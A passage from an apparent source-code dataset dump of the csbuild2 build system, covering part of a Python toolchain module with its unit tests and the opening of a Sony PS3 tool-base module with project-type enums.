\"\n\t\t\t\t\t\t\t\t\t\t\t\"Only staticmethods and classmethods are automatically bundled, non-static methods must be called with toolchain.Tool(FooTool).BarMethod()\"\n\t\t\t\t\t\t\t\t\t\t\t.format(name)\n\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\tif not isinstance(func, staticmethod) and not isinstance(func, classmethod):\n\t\t\t\t\t\t\t\t\t\thasNonFunc = True\n\n\t\t\t\t\t\t\tif hasNonFunc:\n\t\t\t\t\t\t\t\tvalues = {}\n\t\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\t\tval = None\n\t\t\t\t\t\t\t\t\t\tclsContainingVal = None\n\t\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\t\tval = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\t\tclsContainingVal = cls2\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\tassert val is not None, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\t\tif clsContainingVal in values:\n\t\t\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\t\t\tif values:\n\t\t\t\t\t\t\t\t\t\t\traise AttributeError(\n\t\t\t\t\t\t\t\t\t\t\t\t\"Toolchain attribute {} is ambiguous (exists on multiple tools). Try accessing on the class directly, or through toolchain.Tool(class)\".format(name)\n\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\tvalues[clsContainingVal] = val\n\t\t\t\t\t\t\t\treturn values.popitem()[1]\n\n\t\t\t\t\t\t\t# Finding one tool without this function present on it is not an error.\n\t\t\t\t\t\t\t# However, if no tools had this function, that is an error - let python internals\n\t\t\t\t\t\t\t# throw us an AttributeError\n\t\t\t\t\t\t\tif not found:\n\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\n\t\t\t\t\t\t\treturn _runMultiFunc\n\n\t\t\twith perf_timer.PerfTimer(\"Final toolchain creation\"):\n\t\t\t\treturn type(PlatformString(\"Toolchain\"), classes, dict(ToolchainTemplate.__dict__))()\n\n\t################################################################################\n\t################################################################################\n\t### Stub functions for the sake of making code complete work. ###\n\t### See above for actually implementations in ToolchainTemplate. 
###\n\t################################################################################\n\t################################################################################\n\n\t# pylint: disable=redundant-returns-doc\n\[email protected]\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef Use(self, tool):\n\t\t\"\"\"\n\t\tEnter a tool context, must be called before calling any functions that were directly pulled from the tool.\n\t\ti.e.,::\n\t\t\twith toolchain.Use(tool):\n\t\t\t\ttool.Run(toolchain, *args)\n\t\t:param tool: The tool context to enter\n\t\t:type tool: type\n\t\t:returns: Context manager to be used with a 'with' statement\n\t\t:rtype: context manager\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef CreateReachability(self, tool):\n\t\t\"\"\"\n\t\tCreate reachability info for a tool as it's about to be used.\n\t\tThe tool does not have to actively be in the task queue, this should be called every time an input\n\t\tis assigned to a tool, whether it's being processed immediately or being marked as pending.\n\t\t:param tool: The tool to mark reachability for\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef ReleaseReachability(self, tool):\n\t\t\"\"\"\n\t\tReleases reachability info for a tool, marking one instance of the tool finished.\n\t\tNote that for group inputs, this should be released as many times as it was created (i.e., if every\n\t\tinput called CreateReachability, then it needs to also be released once per input)\n\t\t:param tool: The tool to release reachability for\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\tdef HasAnyReachability(self):\n\t\t\"\"\"\n\t\tCheck if any builds have started that didn't finish, if anything at all is reachable.\n\t\t:return: True if reachable, False otherwise\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String)\n\tdef IsOutputActive(self, extension):\n\t\t\"\"\"\n\t\tCheck whether an output of the given extension is capable of being generated.\n\t\t:param extension:\n\t\t:type extension: str, bytes\n\t\t:return: Whether or not the input is active\n\t\t:rtype: bool\n\t\t\"\"\"\n\n\t@TypeChecked(tool=(_classType, _typeType), extension=String)\n\tdef CanCreateOutput(self, tool, extension):\n\t\t\"\"\"\n\t\tCheck whether a tool is capable of ever creating a given output, even indirectly through other tools\n\t\t:param tool: The tool to check\n\t\t:type tool: type\n\t\t:param extension: The extension to check\n\t\t:type extension: str, bytes\n\t\t:return: Whether or not the tool can create that output\n\t\t:rtype: bool\n\t\t\"\"\"\n\n\tdef GetAllTools(self):\n\t\t\"\"\"\n\t\tGet the full list of tools in this toolchain\n\t\t:return: Tool list\n\t\t:rtype: ordered_set.OrderedSet\n\t\t\"\"\"\n\t\tpass\n\n\tdef GetActiveTools(self):\n\t\t\"\"\"\n\t\tGet the full list of active tools in this toolchain\n\t\t:return: Tool list\n\t\t:rtype: ordered_set.OrderedSet\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef DeactivateTool(self, tool):\n\t\t\"\"\"\n\t\tRemove the specified tool from the active tool list. This is used internally when processing\n\t\tnull tools to ensure they don't get processed multiple times. 
You should NOT use this in a\n\t\tmakefile - instead, you should use RemoveTool\n\n\t\t:param tool: tool to remove\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef IsToolActive(self, tool):\n\t\t\"\"\"\n\t\tReturn whether or not the specified tool is active\n\n\t\t:param tool: tool to remove\n\t\t:type tool: type\n\t\t:return: Whether or not the tool is active\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String, generatingTools=(set, type(None)))\n\tdef GetToolsFor(self, extension, generatingTools=None):\n\t\t\"\"\"\n\t\tGet all tools that take a given input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t:type extension: str, bytes\n\t\t:param generatingTools: The tools that generated this input\n\t\t:type generatingTools: set[class] or None\n\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\tfor ALL of that tool's group inputs.\n\t\t:rtype: set[type]\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String, generatingTools=(set, type(None)))\n\tdef GetGroupToolsFor(self, extension, generatingTools=None):\n\t\t\"\"\"\n\t\tGet all tools that take a given group input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t:type extension: str, bytes\n\t\t:param generatingTools: The tool that generated this input\n\t\t:type generatingTools: set[class] or None\n\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\tfor ALL of that tool's group inputs.\n\t\t:rtype: set[type]\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(_return=set)\n\tdef GetSearchExtensions(self):\n\t\t\"\"\"\n\t\tReturn the full list of all extensions handled as inputs by any tool in the toolchain.\n\t\t:return: Set of all extensions\n\t\t:rtype: set[String]\n\t\t\"\"\"\n\t\tpass\n\n\tdef Tool(self, *args):\n\t\t\"\"\"\n\t\tObtain a LimitView object that allows functions to be run only on specific tools\n\n\t\t:param args: List of classes to limit function execution on\n\t\t:type args: class\n\t\t:return: limit view object\n\t\t:rtype: LimitView\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef AddTool(self, tool):\n\t\t\"\"\"\n\t\tAdd a new tool to the toolchain. This can only be used by a toolchain initialized with\n\t\trunInit = False to add that tool to the static method resolution; a toolchain initialized\n\t\twith runInit = True is finalized and cannot have new tools added to it\n\n\t\t:param tool: Class inheriting from Tool\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef RemoveTool(self, tool):\n\t\t\"\"\"\n\t\tRemoves a tool from the toolchain. 
This can be used in a makefile to remove tools within\n\t\tcertain contexts, such as on a specific platform, or to remove default tools, such as\n\t\tthe built-in C++ linker tools.\n\n\t\t:param tool: Class inheriting from Tool\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String, checker=CompileChecker)\n\tdef AddChecker(self, extension, checker):\n\t\t\"\"\"\n\t\tAdd a compile checker for a given extension.\n\n\t\t:param extension: The extension this checker applies to\n\t\t:type extension: str\n\t\t:param checker: The CompileChecker instance to be used for files with this extension\n\t\t:type checker: CompileChecker\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String)\n\tdef GetChecker(self, extension):\n\t\t\"\"\"\n\t\tGet the checker for a given extension. If none has been registered, returns a default CompileChecker instance\n\n\t\t:param extension: The extension to check\n\t\t:type extension: str\n\t\t:return: The checker to use\n\t\t:rtype: CompileChecker\n\t\t\"\"\"\n\t\tpass\n\nclass TestToolchainMixin(testcase.TestCase):\n\t\"\"\"Test the toolchain mixin\"\"\"\n\t# pylint: disable=invalid-name\n\n\tdef setUp(self):\n\t\t\"\"\"Test the toolchain mixin\"\"\"\n\t\t# pylint: disable=missing-docstring\n\t\tglobal staticInitsRun\n\t\tstaticInitsRun = set()\n\t\t# pylint: disable=protected-access\n\t\tToolClass._initialized = False\n\n\t\tself.maxDiff = None\n\n\t\tclass _sharedLocals(object):\n\t\t\tbaseInitialized = 0\n\t\t\tderived1Initialized = 0\n\t\t\tderived2Initialized = 0\n\t\t\tbaseStaticInitialized = 0\n\t\t\tderived1StaticInitialized = 0\n\t\t\tderived2StaticInitialized = 0\n\t\t\tdoBaseThingCalledInBase = 0\n\t\t\tdoBaseThing2CalledInBase = 0\n\t\t\toverloadFnCalledInBase = 0\n\t\t\toverloadFnCalledInDerived1 = 0\n\t\t\toverloadFnCalledInDerived2 = 0\n\t\t\tsetSomeValCalledInBase = 0\n\t\t\tbaseInternalThingCalledInBase = 0\n\t\t\tbasePrivateThingCalledInBase = 0\n\t\t\tderived1AccessSomeValResult = None\n\t\t\tderived1AccessTestResult = None\n\t\t\tderived2AccessSomeValResult = None\n\t\t\tderived2AccessTestResult = None\n\t\t\tderived1PrivateThingCalled = 0\n\t\t\tderived1SameNameThingCalled = 0\n\t\t\tderived2PrivateThingCalled = 0\n\t\t\tderived2SameNameThingCalled = 0\n\t\t\tdoDerived1ThingCalled = 0\n\t\t\tdoDerived2ThingCalled = 0\n\t\t\tdoBaseThingCalledInDerived2 = 0\n\t\t\tbaseInternalThingCalledInDerived1 = 0\n\t\t\tbasePrivateThingCalledInDerived2 = 0\n\t\t\tdoMultiThingCalledInDerived1 = 0\n\t\t\tdoMultiThingCalledInDerived2 = 0\n\t\t\tderived1Static = 0\n\t\t\tderived2Static = 0\n\n\n\t\tclass _base(ToolClass):\n\t\t\tinputFiles = None\n\t\t\toutputFiles = {\"\"}\n\n\t\t\tclass MyEnum(object):\n\t\t\t\t\"\"\"Demo enum class\"\"\"\n\t\t\t\tFoo = 1\n\t\t\t\tBar = 2\n\n\t\t\ttestStaticVar = 3\n\n\t\t\tdef __init__(self, projectSettings):\n\t\t\t\t_sharedLocals.baseInitialized += 1\n\t\t\t\tself._someval = 0\n\t\t\t\tToolClass.__init__(self, projectSettings)\n\n\t\t\t@staticmethod\n\t\t\tdef __static_init__():\n\t\t\t\tToolClass.__static_init__()\n\t\t\t\t_sharedLocals.baseStaticInitialized += 1\n\n\t\t\tdef Run(self, inputProject, inputFile):\n\t\t\t\tpass\n\n\t\t\t@staticmethod\n\t\t\tdef DoBaseThing():\n\t\t\t\t_sharedLocals.doBaseThingCalledInBase += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoBaseThing2():\n\t\t\t\t_sharedLocals.doBaseThing2CalledInBase += 1\n\n\t\t\t@staticmethod\n\t\t\tdef OverloadedFn():\n\t\t\t\t_sharedLocals.overloadFnCalledInBase += 1\n\n\t\t\tdef SetSomeVal(self):\n\t\t\t\t_sharedLocals.setSomeValCalledInBase 
+= 1\n\t\t\t\tself._someval = 12345\n\n\t\t\tdef _baseInternalThing(self):\n\t\t\t\t_sharedLocals.baseInternalThingCalledInBase += 1\n\n\t\t\tdef _basePrivateThing(self):\n\t\t\t\tself._baseInternalThing()\n\t\t\t\t_sharedLocals.basePrivateThingCalledInBase += 1\n\n\n\t\tclass _derived1(_base):\n\t\t\tdef __init__(self, projectSettings):\n\t\t\t\t_sharedLocals.derived1Initialized += 1\n\t\t\t\tself._test = 1\n\t\t\t\t_base.__init__(self, projectSettings)\n\n\t\t\t@staticmethod\n\t\t\tdef __static_init__():\n\t\t\t\t_base.__static_init__()\n\t\t\t\t_sharedLocals.derived1StaticInitialized += 1\n\n\t\t\tdef Derived1CallInternals(self):\n\t\t\t\tself._basePrivateThing()\n\t\t\t\tself._derived1PrivateThing()\n\t\t\t\tself._sameNamePrivateThing()\n\n\t\t\tdef Derived1AccessSomeVal(self):\n\t\t\t\t_sharedLocals.derived1AccessSomeValResult = self._someval\n\t\t\t\t_sharedLocals.derived1AccessTestResult = self._test\n\n\t\t\t@staticmethod\n\t\t\tdef OverloadedFn():\n\t\t\t\t_sharedLocals.overloadFnCalledInDerived1 += 1\n\n\t\t\tdef _baseInternalThing(self):\n\t\t\t\t_sharedLocals.baseInternalThingCalledInDerived1 += 1\n\n\t\t\tdef _derived1PrivateThing(self):\n\t\t\t\t_sharedLocals.derived1PrivateThingCalled += 1\n\n\t\t\tdef _sameNamePrivateThing(self):\n\t\t\t\t_sharedLocals.derived1SameNameThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoDerived1Thing():\n\t\t\t\t_sharedLocals.doDerived1ThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoMultiThing():\n\t\t\t\t_sharedLocals.doMultiThingCalledInDerived1 += 1\n\n\t\t\t@staticmethod\n\t\t\tdef Derived1Static():\n\t\t\t\t_sharedLocals.derived1Static += 1\n\n\t\tclass _derived2(_base):\n\t\t\tdef __init__(self, projectSettings):\n\t\t\t\t_sharedLocals.derived2Initialized += 1\n\t\t\t\tself._test = 2\n\t\t\t\t_base.__init__(self, projectSettings)\n\n\t\t\t@staticmethod\n\t\t\tdef __static_init__():\n\t\t\t\t_base.__static_init__()\n\t\t\t\t_sharedLocals.derived2StaticInitialized += 1\n\n\t\t\tdef Derived2CallInternals(self):\n\t\t\t\tself._basePrivateThing()\n\t\t\t\tself._derived2PrivateThing()\n\t\t\t\tself._sameNamePrivateThing()\n\n\t\t\tdef Derived2AccessSomeVal(self):\n\t\t\t\t_sharedLocals.derived2AccessSomeValResult = self._someval\n\t\t\t\t_sharedLocals.derived2AccessTestResult = self._test\n\n\t\t\t@staticmethod\n\t\t\tdef OverloadedFn():\n\t\t\t\t_sharedLocals.overloadFnCalledInDerived2 += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoBaseThing():\n\t\t\t\t_sharedLocals.doBaseThingCalledInDerived2 += 1\n\n\t\t\tdef Derived2SetSomeVal(self):\n\t\t\t\tself._someval = 54321\n\n\t\t\tdef _basePrivateThing(self):\n\t\t\t\tself._baseInternalThing()\n\t\t\t\t_sharedLocals.basePrivateThingCalledInDerived2 += 1\n\n\t\t\tdef _derived2PrivateThing(self):\n\t\t\t\t_sharedLocals.derived2PrivateThingCalled += 1\n\n\t\t\tdef _sameNamePrivateThing(self):\n\t\t\t\t_sharedLocals.derived2SameNameThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoDerived2Thing():\n\t\t\t\t_sharedLocals.doDerived2ThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoMultiThing():\n\t\t\t\t_sharedLocals.doMultiThingCalledInDerived2 += 1\n\n\t\t\t@staticmethod\n\t\t\tdef Derived2Static():\n\t\t\t\t_sharedLocals.derived2Static += 1\n\n\t\tself.expectedState = {key: val for key, val in _sharedLocals.__dict__.items() if not key.startswith(\"_\")}\n\t\tself._sharedLocals = _sharedLocals\n\t\tself._derived1 = _derived1\n\t\tself._derived2 = _derived2\n\t\tself._base = _base\n\n\t\tself.mixin = Toolchain({}, _derived1, 
_derived2)\n\t\tself.assertChanged(\n\t\t\tbaseInitialized=1,\n\t\t\tderived1Initialized=1,\n\t\t\tderived2Initialized=1,\n\t\t\tbaseStaticInitialized=1,\n\t\t\tderived1StaticInitialized=1,\n\t\t\tderived2StaticInitialized=1,\n\t\t)\n\n\tdef assertUnchanged(self):\n\t\t\"\"\"Assert that the state dict has not changed\"\"\"\n\t\t#Set the expected changes on our expected state and assert that the changed expected state\n\t\t#(including the previous values in that state) matches the actual state\n\t\tactualState = {key: val for key, val in self._sharedLocals.__dict__.items() if not key.startswith(\"_\")}\n\t\tself.assertEqual(self.expectedState, actualState)\n\n\tdef assertChanged(self, **kwargs):\n\t\t\"\"\"Assert that the listed changes (and ONLY the listed changes) have occurred in the state dict\"\"\"\n\t\t#Set the expected changes on our expected state and assert that the changed expected state\n\t\t#(including the previous values in that state) matches the actual state\n\t\tfor key, val in kwargs.items():\n\t\t\tself.assertNotEqual(self.expectedState[key], val)\n\t\tself.expectedState.update(kwargs)\n\t\tactualState = {key: val for key, val in self._sharedLocals.__dict__.items() if not key.startswith(\"_\")}\n\t\tself.assertEqual(self.expectedState, actualState)\n\n\tdef testStaticFunctionCalls(self):\n\t\t\"\"\"Test that static method calls with runInit=False work correctly\"\"\"\n\t\tmixin2 = Toolchain({}, self._derived1, runInit=False)\n\t\tmixin2.AddTool(self._derived2)\n\n\t\tself.assertEqual(mixin2.MyEnum.Foo, 1)\n\t\tself.assertEqual(mixin2.MyEnum.Bar, 2)\n\t\tself.assertEqual(mixin2.testStaticVar, 3)\n\n\t\t#Assert init ran once - during setUp - and only once.\n\t\t#i.e., mixin2 should not have run init!\n\t\tself.assertEqual(1, self._sharedLocals.baseInitialized)\n\t\tself.assertEqual(1, self._sharedLocals.derived1Initialized)\n\t\tself.assertEqual(1, self._sharedLocals.derived2Initialized)\n\t\tmixin2.Derived1Static()\n\t\tself.assertChanged(derived1Static = 1)\n\t\tmixin2.Derived2Static()\n\t\tself.assertChanged(derived2Static = 1)\n\n\tdef testPrivateFunctionCalls(self):\n\t\t\"\"\"Test that internal private function calls work with a variety of inheritance scenarios\"\"\"\n\t\t# Call internal functions on derived 1\n\t\t# This should call _basePrivateThing on the base class and _baseInternalThing on the child\n\t\t# And it should call Derived1PrivateThing on Derived1\n\t\t# And it should call the function named _sameNamePrivateThing defined in Derived1, but NOT the one defined in Derived2\n\t\tself.mixin.Tool(self._derived1).Derived1CallInternals()\n\n\t\tself.assertChanged(\n\t\t\tbasePrivateThingCalledInBase=1,\n\t\t\tderived1PrivateThingCalled=1,\n\t\t\tderived1SameNameThingCalled=1,\n\t\t\tbaseInternalThingCalledInDerived1=1\n\t\t)\n\n\t\t# Call internal functions on derived 2\n\t\t# This should call _basePrivateThing on the derived class and _baseInternalThing on the base\n\t\t# And it should call Derived2PrivateThing on Derived2\n\t\t# And it should call the function named _sameNamePrivateThing defined in Derived2, but NOT the one defined in Derived1\n\t\tself.mixin.Tool(self._derived2).Derived2CallInternals()\n\n\t\tself.assertChanged(\n\t\t\tbaseInternalThingCalledInBase=1,\n\t\t\tderived2PrivateThingCalled=1,\n\t\t\tderived2SameNameThingCalled=1,\n\t\t\tbasePrivateThingCalledInDerived2=1\n\t\t)\n\n\tdef testMultiFunctionCall(self):\n\t\t\"\"\"Test that calling a function with multiple implementations calls all implementations\"\"\"\n\t\t# This should call the 
function defined on the base class by way of Derived1\n\t\t# as well as the overload defined on Derived2\n\t\tself.mixin.DoBaseThing()\n\n\t\tself.assertChanged(\n\t\t\tdoBaseThingCalledInBase=1,\n\t\t\tdoBaseThingCalledInDerived2=1\n\t\t)\n\n\tdef testFunctionCallDeduplication(self):\n\t\t\"\"\"Test that a given function implementation is only called once\"\"\"\n\t\t# This should call DoBaseThing2 on the base class and should only call it ONCE\n\t\tself.mixin.DoBaseThing2()\n\n\t\tself.assertChanged(\n\t\t\tdoBaseThing2CalledInBase=1\n\t\t)\n\n\tdef testBaseClassFunctionNotCalledIfOverloaded(self):\n\t\t\"\"\"Test that a base class implementation is not called if all derived classes override it\"\"\"\n\t\t# This should call the overloaded functions on both Derived1 and Derived2 and should NOT call the base implementation\n\t\tself.mixin.Tool(self._derived1).OverloadedFn()\n\t\tself.mixin.Tool(self._derived2).OverloadedFn()\n\n\t\tself.assertChanged(\n\t\t\toverloadFnCalledInDerived1=1,\n\t\t\toverloadFnCalledInDerived2=1\n\t\t)\n\n\tdef testAccessSharedData(self):\n\t\t\"\"\"Test that accessing data initialized by the base class accesses shared data, and\n\t\tthat accessing data initialized by the child class is isolated from other classes using the same name\"\"\"\n\t\t# This should access self._someVal and self._test in Derived1 as set up by their constructors\n\t\t# self._test should be 1 because it should see the Derived1 instance of it, and not the Derived2 instance\n\t\tself.mixin.Tool(self._derived1).Derived1AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived1AccessSomeValResult=0,\n\t\t\tderived1AccessTestResult=1\n\t\t)\n\n\t\t# This should access self._someVal and self._test in Derived2 as set up by their constructors\n\t\t# self._test should be 2 because it should see the Derived2 instance of it, and not the Derived1 instance\n\t\tself.mixin.Tool(self._derived2).Derived2AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived2AccessSomeValResult=0,\n\t\t\tderived2AccessTestResult=2\n\t\t)\n\n\tdef testChangeSharedDataInBase(self):\n\t\t\"\"\"Test that changes to shared data by the base class are seen by all children\"\"\"\n\t\t# Set self._someVal to 12345 in the base class. This should affect both child classes\n\t\tself.mixin.Tool(self._base).SetSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tsetSomeValCalledInBase=1,\n\t\t)\n\n\t\t# Access values again via Derived1. self.someVal should be 12345 now.\n\t\tself.mixin.Tool(self._derived1).Derived1AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived1AccessSomeValResult=12345,\n\t\t\tderived1AccessTestResult=1,\n\t\t)\n\n\t\t# Access values again via Derived2. 
Just like with Derived1, self.someVal should be 12345 now.\n\t\tself.mixin.Tool(self._derived2).Derived2AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived2AccessSomeValResult=12345,\n\t\t\tderived2AccessTestResult=2,\n\t\t)\n\n\tdef testCallNonStaticMethodWithoutLimitViewThrows(self):\n\t\t\"\"\"Test that trying to call an instance method without defining a single class for scope throws an exception\"\"\"\n\t\twith self.assertRaises(InvalidFunctionCall):\n\t\t\tself.mixin.SetSomeVal()\n\n\t\twith self.assertRaises(InvalidFunctionCall):\n\t\t\tself.mixin.Derived1AccessSomeVal()\n\n\tdef testChangeSharedDataInDerived(self):\n\t\t\"\"\"Test that changes to shared data by a derived class are seen by other derived classes\"\"\"\n\t\t# Set SomeVal by way of Derived2, which despite being a child class should still set the base class instance\n\t\tself.mixin.Tool(self._derived2).Derived2SetSomeVal()\n\n\t\t# Access values again via Derived1. self.someVal should be 54321 now as set by Derived2.\n\t\tself.mixin.Tool(self._derived1).Derived1AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived1AccessSomeValResult=54321,\n\t\t\tderived1AccessTestResult=1,\n\t\t)\n\n\t\t# Access values again via Derived2. Just like with Derived1, self.someVal should be 54321 now.\n\t\tself.mixin.Tool(self._derived2).Derived2AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived2AccessSomeValResult=54321,\n\t\t\tderived2AccessTestResult=2,\n\t\t)\n\n\tdef testFunctionsImplementedOnlyInOneClass(self):\n\t\t\"\"\"Test that functions work correctly even if not all tools support it\"\"\"\n\t\t# Call a function defined only in Derived1 and not in the base class\n\t\tself.mixin.Tool(self._derived1).DoDerived1Thing()\n\n\t\tself.assertChanged(\n\t\t\tdoDerived1ThingCalled=1,\n\t\t)\n\n\t\t# Call a function defined only in Derived2 and not in the base class\n\t\tself.mixin.Tool(self._derived2).DoDerived2Thing()\n\n\t\tself.assertChanged(\n\t\t\tdoDerived2ThingCalled=1,\n\t\t)\n\n\tdef testLimitByTool(self):\n\t\t\"\"\"Test that the Tool() function correctly limits a function call to only the specified tools\"\"\"\n\t\t# Call a function defined in both Derived1 and Derived2, but only call the Derived2 version\n\t\tself.mixin.Tool(self._derived2).DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived2=1,\n\t\t)\n\n\t\t# Call a function defined in both Derived1 and Derived2, but only call the Derived1 version\n\t\tself.mixin.Tool(self._derived1).DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived1=1,\n\t\t)\n\n\t\t# Call a function defined in both Derived1 and Derived2, and this time call both versions to verify\n\t\t# that multiple arguments to Tool works as expected\n\t\tself.mixin.Tool(self._derived1, self._derived2).DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived1=2,\n\t\t\tdoMultiThingCalledInDerived2=2,\n\t\t)\n\n\t\t# Call a function defined in both Derived1 and Derived2, and this time call them both without going through Tool()\n\t\tself.mixin.DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived1=3,\n\t\t\tdoMultiThingCalledInDerived2=3,\n\t\t)\n" }, { "alpha_fraction": 0.624221682548523, "alphanum_fraction": 0.6337443590164185, "avg_line_length": 35.00439453125, "blob_id": "c49d1abec61784a59d4e215e87ff878c50c44426", "content_id": "53c308f0c51ebefbcddda9c055c9831f6d4bbc2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16382, "license_type": 
"no_license", "max_line_length": 118, "num_lines": 455, "path": "/csbuild/tools/common/sony_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: sony_tool_base\n\t:synopsis: Base tools for all Sony tool implementations.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom abc import ABCMeta\n\nfrom csbuild import commands, log\n\nfrom .tool_traits import HasOptimizationLevel\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\n@MetaClass(ABCMeta)\nclass Ps3ProjectType(object):\n\t\"\"\"\n\tReplacement of the base ProjectType enum values specifically for PS3 projects.\n\tThe original ProjectType values still work, but they will map directly to the\n\tPPU SNC output types.\n\n\tNote the overlapping types must be set manually since `ProjectType` cannot\n\tbe imported into this module.\n\t\"\"\"\n\tPpuSncApplication = 1 # Identical to `csbuild.ProjectType.Application`.\n\tPpuSncSharedLibrary = 2 # Identical to `csbuild.ProjectType.SharedLibrary`.\n\tPpuSncStaticLibrary = 3 # Identical to `csbuild.ProjectType.StaticLibrary`.\n\n\tPpuGccApplication = PpuSncApplication + 3\n\tPpuGccSharedLibrary = PpuSncSharedLibrary + 3\n\tPpuGccStaticLibrary = PpuSncStaticLibrary + 3\n\n\tSpuApplication = PpuGccApplication + 3\n\tSpuSharedLibrary = PpuGccSharedLibrary + 3\n\tSpuStaticLibrary = PpuGccStaticLibrary + 3\n\n\n@MetaClass(ABCMeta)\nclass Ps3ToolsetType(object):\n\t\"\"\"\n\tIdentifiers for the toolset that will be used for any given PS3 build.\n\t\"\"\"\n\tPpuSnc = \"ppu-snc\"\n\tPpuGcc = \"ppu-gcc\"\n\tSpu = \"spu\"\n\n\nclass Ps3BuildInfo(object):\n\t\"\"\"\n\tCollection of info representing the type of a project's output and the toolset it will use for the\n\tbuild based on the project type.\n\t\"\"\"\n\tdef __init__(self, projectType):\n\t\tself.outputType = {\n\t\t\tPs3ProjectType.PpuSncApplication: csbuild.ProjectType.Application,\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: csbuild.ProjectType.SharedLibrary,\n\t\t\tPs3ProjectType.PpuSncStaticLibrary: csbuild.ProjectType.StaticLibrary,\n\n\t\t\tPs3ProjectType.PpuGccApplication: csbuild.ProjectType.Application,\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: 
